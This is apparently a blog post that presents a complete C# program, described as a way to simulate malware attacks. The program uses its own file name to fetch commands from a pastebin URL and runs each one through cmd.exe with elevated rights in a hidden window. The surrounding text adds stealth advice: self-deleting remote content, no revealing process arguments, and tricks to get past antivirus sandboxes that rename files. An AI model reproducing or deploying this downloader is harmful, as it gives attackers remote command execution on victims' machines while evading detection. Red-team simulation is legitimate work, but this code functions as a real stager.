The following is a C# code example that can be used to fetch and run commands straight from pastebin. This could be an alternative way to simulate malware attacks, without putting the malicious code on disk. Of course you could put any URL here, but pastebin is a great site since many malware use this site for this purpose.
Depending on what you name the compiled executable or DLL (if sideloading), this will be the unique identifier of where on pastebin to fetch the commands to run. Therefore no suspicious parameters, indicating where the commands were fetched is included as process arguments, and the exe once compiled can be used to run different OS commands.
You could go even more stealth if you run your own server in cloud and content on the URL you fetch from is deleted after it has been fetched.
As a side note, the code below may bypass some antivirus engines – especially those that renames the name of the file when running in a sandbox. Because if the file below is renamed, it would not run any “malicious content”.
using System;
using System.Net;
using System.IO;
using System.Diagnostics;
namespace BinFetcher
{
class Program
{
static void Main(string[] args)
{
string[] lines = new string[1000];
int i = 0;
int max = 0;
var client = new WebClient();
var exec = System.Diagnostics.Process.GetCurrentProcess().ProcessName;
exec = exec.Substring(exec.IndexOf('.') + 1);
/* If you call the file sS6GRywC.exe it will run commands from https://pastebin.com/raw/sS6GRywC */
var url = "https://pastebin.com/raw/"+exec;
Console.WriteLine("Current executable: " + exec);
Console.WriteLine("Reading from: " + url + "\n");
using (var stream = client.OpenRead(url))
using (var reader = new StreamReader(stream))
{
while ((lines[i] = reader.ReadLine()) != null)
{
i++;
}
max = i;
}
for (i = 0; i < max; i++)
{
Console.WriteLine("Executing:" + lines[i]);
var proc1 = new ProcessStartInfo();
proc1.UseShellExecute = true;
proc1.WorkingDirectory = @"C:\Windows\System32";
proc1.FileName = @"C:\Windows\System32\cmd.exe";
proc1.Verb = "runas";
proc1.Arguments = "/c " + lines[i];
proc1.WindowStyle = ProcessWindowStyle.Hidden;
Process.Start(proc1);
}
}
}
}